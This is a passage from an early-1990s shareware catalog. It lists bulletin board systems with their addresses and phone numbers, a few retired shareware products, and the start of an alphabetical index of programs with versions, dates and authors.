48838 + BBS Phone: 616-754-6180 + + The FABulous BBS + Address: 4310 S SEMORAN BLVD SUITE 564, ORLANDO FL 32822 + BBS Phone: 407-277-3449 + + the FLASH POINT bbs + Address: 1665 E JEFFERSON AVE, POMONA CA 92651 + BBS Phone: 714-625-4920 + + The G-Net BBS + Address: 4125 STRATFORD RD, BOARDMAN OH 44512 + BBS Phone: 216-782-6135 + + The Garbage Dump + Address: PO BOX 16032, ALBUQUERQUE NM 87191-6032 + BBS Phone: 505-294-5675 + + The Gooey (GUI) BBS + Address: 217 EAST 85TH ST SUITE 135, NEW YORK NY 10028 + BBS Phone: 212-876-5885 + + THE GRAPEVINE + Address: 1260 THOMPSON AVE, NAPA CA 94558 + BBS Phone: 707-257-2338 + + Appendix C, "Bulletin Boards" 504 + + + + The Grapevine BBS + Address: 5324 CAMP ROBINSON RD, NORTH LITTLE ROCK AR 72118 + BBS Phone: 501-753-8121 + + THE ICEBOX BBS + Address: 144-29 75 AVE, FLUSHING NY 11367 + BBS Phone: 718-793-8548 + + THE INVENTION FACTORY + Address: 321 GREENWICH STREET, NEW YORK NY 10013-3340 + BBS Phone: 212-431-1194 + + THE KANDY SHACK + Address: 12531 STRATHMORE DRIVE, GARDEN GROVE CA 92640 + BBS Phone: 714-636-2667 + + The Lebanon Link + Address: PO BOX 608, LEBANON TN 37087 + BBS Phone: 615-399-0707 + + The Library! BBS + Address: PO BOX 70177, RIVERSIDE CA 92504 + BBS Phone: 714-780-6365 + + The Locker Room + Address: 2125 GREENBRIER ST, SANTA ANA CA 92706 + BBS Phone: 714-542-5917 + + The Mail Room + Address: 903 COLLEGE DR. APT 1, ANDERSON IN 46012-4040 + BBS Phone: 317-644-5029 + + The Miami PC Users Group + Address: 10448 SW 49TH PLACE, COOPER CITY FL 33328 + BBS Phone: 305-680-9481 + + THE MODEMS DELIGHT BBS + Address: 14503 SABINE DR, LA MIRADA CA 90638 + BBS Phone: 213-944-1221 + + THE MOTHER BOARD BBS + Address: 318 E. 8TH, NEWTON KS 67114 + BBS Phone: 316-284-2421 + + The Nor'Easter Premimum BBS + Address: 67 BAYBERRY LANE, LONDONDERRY NH 03053-4606 + BBS Phone: 603-432-6711 + + THE OPENWINDOW BBS + Address: 30 BROADWAY, BEVERLY MA 01915 + BBS Phone: 508-927-7224 + + Appendix C, "Bulletin Boards" 505 + + + + The Other BBS + Address: PO BOX 6501, HARRISBURG PA 17112 + BBS Phone: 717-657-8699 + + THE PC JUNCTION BBS + Address: 323 TN NURSERY RD., CLEVELAND TN 37311 + BBS Phone: 615-478-2890 + + The Point BBS + Address: 122 CEDAR ST, STEVENS POINT WI 54481 + BBS Phone: 715-345-1327 + + The PROF-BBS + Address: 2050 IDLE HOUR CENTER STE 106, LEXINGTON KY 40502 + BBS Phone: 606-269-1565 + + The Red Phone Information Sys + Address: 215 WEST 11TH STREET, NEW YORK NY 10014 + BBS Phone: 212-924-1138 + + The RoadHouse BBS + Address: 4095-B CREEK WAY, INDIANAPOLIS IN 46227-4036 + BBS Phone: 317-784-2147 + + The Round Table BBS + Address: PO BOX 6731, WYOMISSING PA 19610 + BBS Phone: 215-678-0818 + + The Shareware Support BBS + Address: 26 STANLEY HILL AVE, AMERSHAM BUCKS HP7 9BD U K + BBS Phone: 44 494 431861 + + The TIMES + Address: 1500 CENTRAL AVENUE, ALBANY NY 12205 + BBS Phone: 518-452-4757 + + The TOY SHOP-PC BBS + Address: 4195 ELWOOD ROAD, SPRING HILL FL 34609 + BBS Phone: 904-688-9124 + + THE TWILIGHT ZONE + Address: 1119 E. MAIN STREET, AUBURNDALE WI 54412 + BBS Phone: 715-652-2758 + + THE UNIVERSAL JOINT + Address: 13125 W 85TH PL, ARVADA CO 80005 + BBS Phone: 303-425-6950 + + THE WINDOWS BBS + Address: 115-H PINEWOOD CRESCENT, YORKTOWN VA 23693 + BBS Phone: 804-766-0553 + + Appendix C, "Bulletin Boards" 506 + + + + Toledo's TBBS + Address: 4440 SAMARIA ROAD, TEMPERANCE MI 48182 + BBS Phone: 313-856-8183 + + Totoche BBS + Address: 6305 BEAUCOURT, MONTREAL-NORD QC H1G 2G3 CANADA + BBS Phone: 514-326-8363 + + Turning Point Information Svc + Address: 12511 TURKEY RIDGE, AUSTIN TX 78729 + BBS Phone: 512-219-7828 + + Uncle Bob's BBS + Address: 924 APACHE TRAIL, LAKE VILLA IL 60046 + BBS Phone: 708-265-0698 + + Visions InfoLine + Address: 885 STERLING ST., PLAINFIELD NJ 07062 + BBS Phone: 908-769-1779 + + Windchimes BBS + Address: PO BOX 2100, JUPITER FL 33468 + BBS Phone: 407-220-3312 + + WINGIT + Address: 1929 NORTH MISSION ROAD, TALLAHASSEE FL 32303 + BBS Phone: 904-386-8693 + + WOLVERINE + Address: 4702 JEFFERSON, MIDLAND MI 48640 + BBS Phone: 517-631-3471 + + Xanadu + Address: 34 DANE STREET, BEVERLY MA 01915 + BBS Phone: 508-921-2204 + + Xevious BBS + Address: 92 BISHOP DRIVE, FRAMINGHAM MA 01701-6515 + BBS Phone: 508-875-3618 + + ZEN DEN SYSTEMS BBS + Address: 305 KREST STREET, MADERA CA 93637 + BBS Phone: 209-675-8436 + + [PARAMETERS]InformationService + Address: 513 W. WALNUT ST., CARBONDALE IL 62901-2613 + BBS Phone: 618-549-8448 + + Appendix D, "Retired shareware" 507 + + + + + + Appendix D + Retired shareware + + This appendix lists shareware products now "retired" by the + author. Retired products no longer receive the minimum levels + of support, and the authors have agreed to return any registra- + tion fees sent in for the software. + + An author may retire a shareware product for any number of + reasons. Some applications have outlived their usefulness; + others may have grown too costly to continue supporting due to + competition from other authors. + + + Product: DiZkND + Unicorn Software Limited + THE DiZk cataloger for NDOS. + + Product: Home Money Manager II (and I) + HomeCraft Software + Home checkbook and budgeting. + + Product: Penname + R.K. West Consulting + Create pennames & character names for writers. + + Product: Soothsayer aka Oracle + R.K. West Consulting + I Ching and Tarot. + + Product: Stardial + GTX Software + AutoDialer For Galaxy/Starlink Service. + + Product: Your Financial Advisor + HomeCraft Software + Loan and finacial calculations. + + Appendix E, "Sorted list of all programs" 508 + + + + + + Appendix E + Sorted list of all programs + + This appendix notes the author of each program listed in this + catalog. It comes in extremely handy when you want to see if a + given program comes from an ASP member, or when you want to + know the current version number/release date for a program. + Hint: look in the index for the program (by name) if you want + to see a full description for the program or learn the author's + address & phone number. You'll find page references to all the + information you need. + + + 3 ball Juggler 1.13 (12-08-91) -- First Magnitude + 4DOS 4.0 (08-26-91) -- JP Software Inc. + 4EDIT 1.09 (10-13-91) -- XD Systems + 4FILES 2S.4 (03-31-92) -- Hand-Crafted Software + 4Print 4.1 (08-15-91) -- Korenthal Associates, Inc. + 4Shell for Windows 1.0 (08-21-91) -- ZPAY Payroll Systems, Inc. + (Paul Mayer) + 4ZIP/4UNZIP 2.00 (10-24-91) -- XD Systems + -=Tab123=- 1.2 (12-17-91) -- Mountain Software + AC11TO10 2.20 (03-01-92) -- Software Designs, Inc. + ACCEL 1.0 (11-01-91) -- JSOFT + ACCU BBS Lister 3.0 (06-18-91) -- Kevin Fischer + ACCU Music Printer 2.1 (03-23-91) -- Kevin Fischer + ActaeOn V1.60 (11-12-91) -- Jon Clempner + ActCalendar 2.5 (01-22-91) -- ShareGames + ActMenu 5.9 (05-04-91) -- ShareGames + The Address Book Solution 2.1 (05-31-91) -- GSF Software & + Solutions + Aerosoft Fitness Log 2.3 (10-15-91) -- Aerosoft + AFFORD IT??? 3.02 (08-22-91) -- Garrett Krueger Software + Development + ALBUM KEEPER II 2.12 (06-01-91) -- CACHE MICROSYSTEMS + AlbumMaster 6.71 (09-02-91) -- Unicorn Software Limited + ALITE 1.10f (12-15-91) -- TRIUS, Inc. + ALLY 1.32 (03-18-91) -- Wasco Technical Software + ALPHAQUOTE 2.3 (05-06-91) -- AlphaBytes, Inc. + ALPS 3.0 (11-15-91) -- ALPS Software + ALPS(PC) 3.0 (11-15-91) -- ALPS Software + AM-EDIT 1.00 (01-10-92) -- PLC Software + AMORTIZATION TABLE 3.52 (04-26-91) -- H&P Software + AMORTZ 1.30 (06-30-91) -- Oregon Software Group + Ample Notice 2.04 (05-21-91) -- Granny's Old-Fashioned Software + AntiC 1.11 (02-02-92) -- Cascoly Software + APCAL 3.10 (01-10-92) -- Gamma Software + Approved Vendor Requirements n/a (07-01-91) -- Association of + Shareware Professionals + Architectural Engineering 3.0 (11-15-91) -- ALPS Software + AS-EASY-AS 5.01b (04-07-92) -- TRIUS, Inc. + + Appendix E, "Sorted list of all programs" 509 + + + + ASP BBS Membership Application n/a (02-15-91) -- Association of + Shareware Professionals + ASP Catalog for BBSs n/a -- Association of Shareware + Professionals + ASP Catalog for CompuServe n/a -- Association of Shareware + Professionals + ASP Catalog for GEnie n/a -- Association of Shareware + Professionals + ASP List of Approved BBSs n/a (07-01-91) -- Association of + Shareware Professionals + ASP List of Approved Vendors n/a (07-01-91) -- Association of + Shareware Professionals + ATC: Air Traffic Controller 1.0 (09-29-85) -- Cascoly Software + Attribution 1.12 (06-09-91) -- Richard W. Adams + AutoCon 2.0g (03-14-92) -- Larry Weaver + AxTrons 1.0 (02-17-90) -- ShareGames + Babble! 2.0 (02-08-91) -- Korenthal Associates, Inc. + Backup 2.05 (06-16-91) -- Richard W. Adams + Backup/2 1.01 (07-07-91) -- Richard W. Adams + Badge-O-Magic 1.2 (07-10-89) -- Ward Mundy Software + BakupWiz 3.29fl (01-03-92) -- PCX + Balloons 3.8 (03-29-91) -- AssistWare + Bannerific 1.1 (01-01-91) -- TexaSoft + Bass Class 1.2 (03-22-91) -- Olsen Outdoors + BassTour 4.5 (03-26-91) -- Olsen Outdoors + BATUTIL 4.0 (12-23-91) -- CTRLALT Associates + BCS Menu Program 2.0 (12-10-90) -- Bristol Computing Systems, + Inc. + BESTTEST 1.5 (06-01-91) -- WiseWare + The Better Diet Analyzer 3.1 (01-11-92) -- Syntonic Software + BlackJack! 2.21p (06-05-91) -- Glencoe Computing + BLANK-IT 5.1a (03-02-92) -- Rhode Island Soft Systems, Inc. + Bmenu 5.41 (09-17-90) -- Mark Strong + Book Librarian 1.5s (01-28-92) -- TurboSystemsCo + Book of Changes 1.61 (03-01-92) -- R.K. West Consulting + BookBank 1.1 (02-01-92) -- Data By Design + BOOKLET 3.7 (10-23-91) -- Sympathetic Software + BOOKLET-SCREEN 1.4 (10-23-91) -- Sympathetic Software + BOOT.SYS 1.42 (07-03-91) -- Hans Salvisberg + BootMaster 3.2 (01-01-92) -- RoSi Software + Border 1.1 (02-23-89) -- Cascoly Software + BOXER(tm) Text Editing System 3.20 (01-25-92) -- BOXER Software + BRAINdead2 1.00 (09-04-91) -- Michael Donat + Brandon's Bigbox 1.5 (02-04-92) -- Robichaux and Associates + BridgePal 2.02 (04-29-90) -- WR Software + Brother's Keeper 5.0 (01-01-92) -- John Steed + Browse/2 1.34 (07-26-91) -- Wolf Software Design + Btr Help! 1.88 (06-15-91) -- Informative Technologies + Btr Watch 1.0 (09-15-91) -- Informative Technologies + Business Plan Master (IBM) 1.2 (03-21-92) -- Grand Universal + Business Plan Master (Mac) 1.2 (03-25-92) -- Grand Universal + By the Numbers 4.52 (03-01-92) -- R.K. West Consulting + C.A.R.S. 2.8 (03-27-92) -- Cybernetic Software + CADET 3.0 (03-18-91) -- Wasco Technical Software + + Appendix E, "Sorted list of all programs" 510 + + + + Calculation Solitaire 1.12 (12-23-91) -- Daniel Thomas + CALC_JNC 8.24 (02-24-92) -- James N. Cox + Calendar Keeper 3.0a (02-02-91) -- Dataphile Software + Calendar Mate 4.1 (06-01-91) -- Hawk Software + CALendar preview for SideKick 2 1.03 (05-13-91) -- WetZoft + Applications + CALendar RePorT for SideKick+ 2.51 (04-08-91) -- WetZoft + Applications + CALendar report for TRaVel 1.05 (04-08-91) -- WetZoft + Applications + Canfield For Windows 1.01 (01-04-92) -- Daniel Thomas + Capbuf 1.41 (12-28-90) -- Cascoly Software + Capital Gainz 3.0 (02-24-92) -- DBLinx + Cash Control 1.21S (01-01-91) -- Adrian-Thomas Developments, Inc. + CassetteMaster 7.40 (07-20-91) -- Unicorn Software Limited + CATALOG-ON-A-DISK 2.00 (03-15-92) -- EmmaSoft + CatScan 3.0 (06-15-91) -- Rochester Heritage + CDMaster 6.71a (10-06-91) -- Unicorn Software Limited + Changer/2 1.01 (07-06-91) -- Richard W. Adams + Charge Account Management Prog. 1.11 (11-08-89) -- M. P. Data + Checkbook Management Program 5.03 (05-07-90) -- M. P. Data + CheckMate Plus 1.50 (02-02-92) -- Custom Technologies + "Cheque-It-Out" 1.1C (03-01-91) -- Hooper International, Inc. + The Children's Graphics Program 3.0 (12-12-91) -- Motes + Educational Software + Chris's Automobile Recorder 12.2A (03-28-91) -- Cooney Applied + Technology + CHRONOS 2.05 (03-30-92) -- Cascoly Software + Church Membership Tracking Sys 3.0 (07-06-91) -- Torbert Data + Systems, INC. + Cipher 2.1 (10-09-91) -- Arcanum Computing + Cipher for Windows 1.0 (10-02-91) -- Arcanum Computing + The Cipher-Ace Series 2.0 (02-28-92) -- Charles W. Stewart + Circle Link 1.1 (06-12-90) -- ShareGames + Citizen 3.02 (01-01-92) -- R.K. West Consulting + CleanUp 2.1 (11-02-90) -- ShareGames + ClipMate for Windows 1.14 (03-07-92) -- Chris Thornton + CLOCK 2.00 (01-10-92) -- Gamma Software + CM_FILER 5.22 (03-09-92) -- NoVaSoft + CODE TO CODE 4.0 (04-29-91) -- AlphaBytes, Inc. + Collect! (VGA version) 1.01 (01-01-92) -- Alston Software Labs + COM-AND 2.8 (10-19-91) -- CABER Software + Command Post 7.0S (02-15-91) -- Wilson WindowWare, Inc. + Complement & Schedules 3.0 (11-15-91) -- ALPS Software + Complement & Schedules(PC) 3.0 (11-15-91) -- ALPS Software + CompUser 2.70b (04-04-92) -- Unicorn Software Limited + Computer Trivia Quiz 1.0 (09-07-91) -- Shoestring Software + ConvDW 1.2 (01-20-90) -- CrossCourt Systems + Convert To Structured BASIC 1.3 (11-15-91) -- Unique Software + Creativity Package 3.1 (03-01-92) -- R.K. West Consulting + CROSSDOWN 2.6 (02-24-92) -- CROSSDOWN + Crossword Clipper for Windows 1.00 (02-01-92) -- PC HELP-LINE + Crossword Creator 5.00 (02-01-92) -- PC HELP-LINE + Crystal Ball 3.11 (03-01-92) -- R.K. West Consulting + + Appendix E, "Sorted list of all programs" 511 + + + + CtrlcLib 1.0 (01-01-91) -- Trendtech Corporation + Curses! 2.11 (03-01-92) -- R.K. West Consulting + Custodial Requirements 3.0 (11-15-91) -- ALPS Software + Custodial Requirements(PC) 3.0 (11-15-91) -- ALPS Software + Custom#Menu 1.81 (12-18-91) -- Mountain Software + Dad's Choice 2.0 (09-09-91) -- Motes Educational Software + DaMenu 1.1 (04-02-92) -- Just-In-Time Computing Services + DARN! Don't Forget! 3.00 (07-12-90) -- EmmaSoft + DasBOOT! 1.30 (02-07-92) -- WHEEL Games + Data Master 2.2 (04-22-92) -- RKS Software, Inc. + DayMaster 3.70a (11-10-91) -- Unicorn Software Limited + DAYO ACCOUNTS PAYABLE (AP) 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO ACCOUNTS RECEIVABLE (AR) 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO BACK ORDERS (BO) 2.0 (04-01-91) -- TJS LAB, Inc. + DAYO BAR CODE 3 OF 9 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO BILLING & INVOICING 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO END OF PERIOD 3.0 (06-24-91) -- TJS LAB, Inc. + DAYO GENERAL LEDGER (GL) 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO INDEX 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO INVENTORY 3.1 (06-27-91) -- TJS LAB, Inc. + DAYO LITTLE POS 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO LOOKUP 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO MEMBERSHIP 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO MENU 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO MRP 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO ORDER ENTRY 3.0 (06-12-91) -- TJS LAB, Inc. + DAYO PASSWORDS 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO PAYROLL 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO POS (POINT OF SALE) 3.1 (06-28-91) -- TJS LAB, Inc. + DAYO PRICE BOOK 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO QUOTES 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO RENTAL POS 3.0 (06-26-91) -- TJS LAB, Inc. + DAYO RETURN MANAGEMENT SYSTEM 2.0 (05-01-91) -- TJS LAB, Inc. + DAYO RETURNS & REFUNDS 2.0 (06-28-91) -- TJS LAB, Inc. + DAYO SIMPLE POS 2.0 (06-01-91) -- TJS LAB, Inc. + DAYO SMART REPORTS 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO TIME & BILLING 3.0 (06-24-91) -- TJS LAB, Inc. + DB2DOC 2.0 (06-30-91) -- Carlos Berguido + DB2PRG 2.1 (06-30-91) -- Carlos Berguido + dbDIAL(tm) 1.02 (01-06-92) -- ZPAY Payroll Systems, Inc. (Paul + Mayer) + dBF-View 1.0 (06-01-91) -- MSC - Morariu Software Consulting + Decision Analysis 3.0 (11-15-91) -- ALPS Software + Decision Analysis(PC) 3.0 (11-15-91) -- ALPS Software + Decoder! 1.2 (09-13-91) -- Trinity Software + DialThat 1.03 (02-01-91) -- Real Software + Diamond Data 4.0 (04-01-92) -- The Software Construction Co. + DICOGO 3.0 (09-30-91) -- DI Management Corporation + DIMANAGE 2.1 (06-14-91) -- DI Management Corporation + Dinger 2.0 (02-15-91) -- Pinecliffe International + DirBack 3.6 (01-21-91) -- ShareGames + DIRECT MAINT 2.0 (07-01-89) -- MORSOFT + Director 2.03 (06-09-91) -- Richard W. Adams + Directory Freedom 4.50 (12-05-91) -- Bit Masons Consulting + + Appendix E, "Sorted list of all programs" 512 + + + + DIREDIT 3.05 (05-31-90) -- Computer Counselors, Inc. + DiscTrak System 1.62 (10-08-91) -- Blam Entertainment Group + Disk DUP 5.9a (11-08-90) -- FormGen Corp. + Disk Manager (CUDM) 3.30 (08-01-91) -- Micro System Solutions + Disk OrGanizer (DOG) 3.14 (08-18-91) -- Soft GAM's Software + DISK SPOOL II 4.00 (06-27-91) -- Budget Software Company + DISKLIST 2.50 (04-21-92) -- Gulf Sierra + DiZk4D 3.03 (11-18-91) -- Unicorn Software Limited + DJ-CHECK 1.01 (03-01-92) -- JMJ Software + DJ-LOPE 3.0 (03-01-92) -- JMJ Software + DJ-SLEEVE 2.0 (03-01-92) -- JMJ Software + dLITE 2.0 (07-01-91) -- Ward Mundy Software + DMP 2.05 (01-15-91) -- DMP Software + DMPLAS (Dot Matrix to LaserJet) 1.0 (08-15-91) -- Software Co-op + DOS Extensions for Professional 1.1 (09-02-91) -- Allison + Software + DOS Summary 1.01 (02-23-91) -- Computer Knowledge + DOS Summary (Hypertext) 2.0 (02-15-92) -- Computer Knowledge + DosEA 1--For Absolute Beginners 2.00 (05-19-91) -- Langin + Software + DosEA 2--What is DOS? 2.00 (05-19-91) -- Langin Software + DosEA 3--10 Easy Commands 2.00 (05-19-91) -- Langin Software + DosEA 4--Find That Command! 2.00 (05-19-91) -- Langin Software + DosEA 5--All About MS-DOS 5.0 1.00 (07-05-91) -- Langin Software + DosEA 6--Switched on DOS 1.00 (09-14-91) -- Langin Software + DOWNLOAD 1.1 (04-22-91) -- TaxWare + dPerfect Merge 1.6 (04-09-92) -- Newdorf Research + Dr. Motes' Colorbook 1.0 (02-02-92) -- Motes Educational Software + DRAFT CHOICE 1.51g (01-09-92) -- TRIUS, Inc. + DrawSome 2.4 (03-30-91) -- AssistWare + DressMeUp 2.2 (11-14-90) -- ShareGames + dtSearch 1.1 (08-14-91) -- DT Software, Inc. + Dueling Dragons 1.0 (02-02-90) -- ShareGames + Dupes 3.10 (01-11-92) -- Richard W. Adams + Duplicate File Manager 3.0 (09-01-91) -- Micro System Solutions + Early Bird 1.0f (08-17-91) -- Allan Computer Products + Easy Access 6.2a (05-20-91) -- TengWare Enterprises + EASY BANKING 1.2 (01-01-92) -- The Durol Company + Easy Format 3.20 (11-30-90) -- Falk Data Systems + Easy Project 4.02 (05-01-91) -- Parcell Software + Easydial 3.6 (07-10-91) -- Patri-Soft + Ecomaster 1.1 (11-15-90) -- Cascoly Software + EDDY (EDit DirectorY) 6b2 (01-04-92) -- John Scofield + EDWORD 1.0 (11-26-91) -- FAGERLUND CONSULTING + EE 3.0 (11-15-91) -- ALPS Software + EGA Mouse Paint 4.2 (01-30-92) -- Fischer Grafix & Software + EGATrek 3.0 (01-22-92) -- Arcanum Computing + EGAWHEEL V.17.0S (01-01-92) -- WHEEL Games + ELECTRON 2.5 (04-23-91) -- H&P Software + EliteCheck 1.1a (10-01-91) -- Taewoong Jeon + EM Klondike 3.01 (05-01-91) -- EM Software + EM Poker Solitaire 2.0 (05-30-91) -- EM Software + EM Pyramid 1.07 (05-30-91) -- EM Software + ENIGMACROSS 1.0 (04-09-92) -- CROSSDOWN + + Appendix E, "Sorted list of all programs" 513 + + + + Enveloper 3.2 (05-07-91) -- Pinecliffe International + ENVI-MAN 1.00 (04-26-91) -- Micrometric + EQUALIZER 1.03 (03-20-92) -- Nine-Patch Software + ESF's DeskJet Fonts & Utilities 1.5 (07-10-91) -- Elfring Soft + Fonts + ESF's European DeskJet Fonts 1.0 (07-10-91) -- Elfring Soft Fonts + ESF's European LaserJet Fonts 1.0 (05-20-91) -- Elfring Soft + Fonts + ESF's LaserJet Fonts & Util. 1.5 (07-10-91) -- Elfring Soft Fonts + Ethics Awareness 1.1 (03-21-92) -- Niche Software + EVA 1.12 (05-01-91) -- Gateway Software + Except 2.00 (06-15-91) -- Richard W. Adams + EXTENDED BATCH LANGUAGE-PLUS! 4.07 (07-01-91) -- Seaware Corp. + EZ-Reader 1.33 (09-30-90) -- Thumper Technologies + EZ-Reader 2.00 (08-02-91) -- Thumper Technologies + Family Tree Print Utility C (03-01-91) -- Common Sense Software + Fantasy 2.0 (09-01-90) -- Natural Software + FAST INVOICE WRITER 4.91 (07-23-91) -- H&P Software + FAST STATEMENT WRITER 4.1 (07-11-91) -- H&P Software + FASTFILE 5.33 (07-09-91) -- Interactive Mini Systems, Inc. + FASTMAIL 2.27 (06-01-91) -- CACHE MICROSYSTEMS + fastmenu GOLD 4.1 (09-01-91) -- jwh: SoftWare + FBNCAT 3.0 (11-01-90) -- FBN Software + FCOMP 1.01 (01-10-92) -- Gamma Software + FDplot 1.2 (02-27-92) -- Abri TEchnologies, Inc. + Federal Express Label Printer 1.01a (01-11-91) -- TVSware (Tom + Sollas) + Fictionary 1.32 (04-30-90) -- Cascoly Software + FIELD GENERAL 5.1 (01-15-92) -- rbm software + FILE PATCH 2.0 (07-01-89) -- MORSOFT + FILE-MAN 4.21 (05-24-91) -- Micrometric + FileFinder 3.8 (04-01-92) -- California Software Design + Filer! 1.92 (12-16-91) -- Trinity Software + FileXref 1.3 (10-01-91) -- ConVal Software, Inc. + Find Area Code (FAC) 1.61 (11-18-91) -- Mountain Data Systems + FISHBYTE(tm) 1.2 (01-07-92) -- EJM Computer Consulting Ltd. + Flags 1991b (08-01-91) -- Wyndware + Flex 1.02 (06-16-91) -- Logical Systems + FlexBase 1.0 (11-20-91) -- National MicroSystems + FLEXIBAK Plus 2.01 (03-11-92) -- Nildram Software + Flow Process 3.0 (11-15-91) -- ALPS Software + Flow Process(PC) 3.0 (11-15-91) -- ALPS Software + Flu_Shot+ 1.82 (05-11-91) -- Software Concepts Design + Folders 3.4a (07-29-91) -- Sloop Software + FormGen 4.1a (12-19-90) -- FormGen Corp. + FormGen Business Collection 1.0 (07-23-90) -- FormGen Corp. + FormGen Fill 1.5 (12-19-90) -- FormGen Corp. + FormGen Home Collection 1.0 (07-23-90) -- FormGen Corp. + FormGen Utility Pak #1 1.01 (10-30-90) -- FormGen Corp. + Fortune Teller 3.51 (08-15-91) -- R.K. West Consulting + FOURU 2.0 (07-01-91) -- GTX Software + FPLAN-Captital Needs Planner 3.0 (04-21-91) -- First Financial + Software + + Appendix E, "Sorted list of all programs" 514 + + + + FPLAN-Education Funding Planner 3.0 (04-21-91) -- First Financial + Software + FPLAN-Income Protection Planner 3.0 (04-21-91) -- First Financial + Software + FPLAN-Personal Financial Plnr 3.0 (04-21-91) -- First Financial + Software + FPLAN-Retirement Planner 3.0 (04-21-91) -- First Financial + Software + Furniture & Equipment Survey 3.0 (11-15-91) -- ALPS Software + Furniture, Equipment Survey(PC) 3.0 (11-15-91) -- ALPS Software + GEMCAP 4.01 (09-01-90) -- Natural Software + Geomancy 4.04 (03-01-92) -- R.K. West Consulting + Get Lucky! 2.25 (06-05-89) -- Glencoe Computing + Getkey/2 1.00 (02-25-90) -- Richard W. Adams + Globally 1.22 (06-09-91) -- Richard W. Adams + Globally/2 1.11 (07-06-91) -- Richard W. Adams + Gopher's Garden 1.1 (06-17-90) -- ShareGames + GRAB Plus(r) 6.1 (09-20-91) -- ZPAY Payroll Systems, Inc. (Paul + Mayer) + GRAB Plus(r) for Windows 1.3 (09-20-91) -- ZPAY Payroll Systems, + Inc. (Paul Mayer) + GradeBook for Windows 1.05 (04-07-92) -- Russell Stevens + Graphical Representation 3.0 (11-15-91) -- ALPS Software + Graphical Representation(PC) 3.0 (11-15-91) -- ALPS Software + GREEN 1.02 (03-30-92) -- Cascoly Software + HandyDOS 1.2 (02-27-92) -- Abri TEchnologies, Inc. + Hangman for Students 1.01 (03-09-91) -- Langin Software + Hard at Work 1.1 (06-01-91) -- R.K. West Consulting + Hard Disk Director 5.0 (02-09-92) -- Canyon Software + HDM IV - Hard Disk Menu IV 3.10 (06-28-91) -- MicroFox Company + HDTEST 5.35a (10-20-91) -- Computer Counselors, Inc. + Hearts 6c (01-15-92) -- CareWare + HiMOVE 2.14 (11-01-90) -- C.Sitte Softwaretechnik + HOME BUDGET MANAGEMENT SYSTEM 4.21 (05-20-91) -- Brentson Worrell + Home Helper 1.3 (11-09-91) -- Torbert Data Systems, INC. + Home Sales System 3.2 (02-04-92) -- Grumpyware + Hotnet 3.04 (02-04-92) -- Robichaux and Associates + Household Register 3.0s (01-28-92) -- TurboSystemsCo + HouseHold TRACKER 1.3a (02-10-92) -- Fischer Grafix & Software + How to join as a "beta" author n/a (11-27-89) -- Association of + Shareware Professionals + HowTwo 2.1 (02-05-91) -- ShareGames + HUGO II, WHODUNIT? 1.1 (06-02-91) -- Gray Design Associates + HUGO'S HOUSE OF HORRORS 1.6 (06-02-91) -- Gray Design Associates + HyperPAD 2.2 (05-22-91) -- Brightbill-Roberts and Company, Ltd. + HyperSlide 1.02 (05-12-91) -- John Intorcio + I.Q. Challenge 1.23 (03-01-92) -- R.K. West Consulting + IBM PC Author Application n/a (07-01-91) -- Association of + Shareware Professionals + ICP 7.0 (02-01-92) -- Spirit7 Software, Ltd. + InContext 1.02 (10-21-91) -- Rams' Island Software + Index! 1.4e (05-30-91) -- Trinity Software + Information about copyrights n/a (04-29-90) -- Association of + Shareware Professionals + + Appendix E, "Sorted list of all programs" 515 + + + + Information Please 2.07 (06-26-91) -- TexaSoft + Instant Access Menu System 2.8 (07-05-90) -- Prodigy Technologies + Integrity Master(tm) 1.11a (02-17-91) -- Stiller Research + THE INTERSTATE TRAVELER 1.1 (04-06-92) -- David E. Jacobson + Japanese Business Culture 1.1 (03-23-92) -- Niche Software + JDIR 1.1 (01-11-90) -- Cybernetic Software + JEPRS (Jeepers!) 2.54 (10-20-91) -- Louis M. Miranda + KEYTREE TOOLBOX 3.10 (08-01-91) -- REWSE CONSULTANTS LIMITED + KEYTREE UTILITIES 3.10 (08-01-91) -- REWSE CONSULTANTS LIMITED + KICK 1.0 (07-01-91) -- TexaSoft + KP5 5.07 (01-27-92) -- Peter Charpentier + KWIKSTAT 2.1 (05-24-91) -- TexaSoft + KWIKWRITE 4.01 (01-01-91) -- TexaSoft + Label Master 5.1 (04-22-92) -- RKS Software, Inc. + LambChop 1.02 (01-21-92) -- LambWare + LAN-LINK 1.59 (04-01-91) -- Software for Amateur Radio + LaserForm 1.00 (07-01-91) -- Real Software + LASR-MAN 2.11 (05-24-91) -- Micrometric + the last word 1.00 (11-25-90) -- Bit Masons Consulting + The Laughing Dog Screen Maker 1.00 (04-12-92) -- Yardbird + Software + LaunchCAD 3.7 (10-07-91) -- Mountain Software + Launcher 1.21 (06-09-91) -- Richard W. Adams + Layout 2.0 (06-01-91) -- Software Co-op + Layout Planning 3.0 (11-15-91) -- ALPS Software + Layout Planning(PC) 3.0 (11-15-91) -- ALPS Software + LCD: Led's Change Directory 3.1a (05-06-91) -- Keith Ledbetter + LEANER 1.52 (10-10-91) -- MoonStone Software + LessonPlanZ 2.10 (01-07-92) -- Unicorn Software Limited + Listico 2.00 (05-01-91) -- Gateway Software + Lite Format 1.20 (03-15-91) -- Falk Data Systems + LiteComm(tm) for Microsoft C 6.00 (07-01-91) -- Information + Technology, Ltd. + LiteComm(tm) for Turbo C 6.00 (07-01-91) -- Information + Technology, Ltd. + LiteSPM 1.01 (07-01-91) -- Information Technology, Ltd. + Little Black Book 1.41 (12-12-91) -- GTX Software + LJ-SLEEVE 1.0 (03-31-92) -- JMJ Software + LJ2DJ 2.4 (01-11-92) -- TaxWare + LJLAND 3.04 (02-07-92) -- TaxWare + LK4.EXE 2.0 (10-20-91) -- GTX Software + Loan Amortization 1.0 (06-01-91) -- TexaSoft + LOGGIT 4.00 (01-01-91) -- GTX Software + LOGIK MENU 1.61 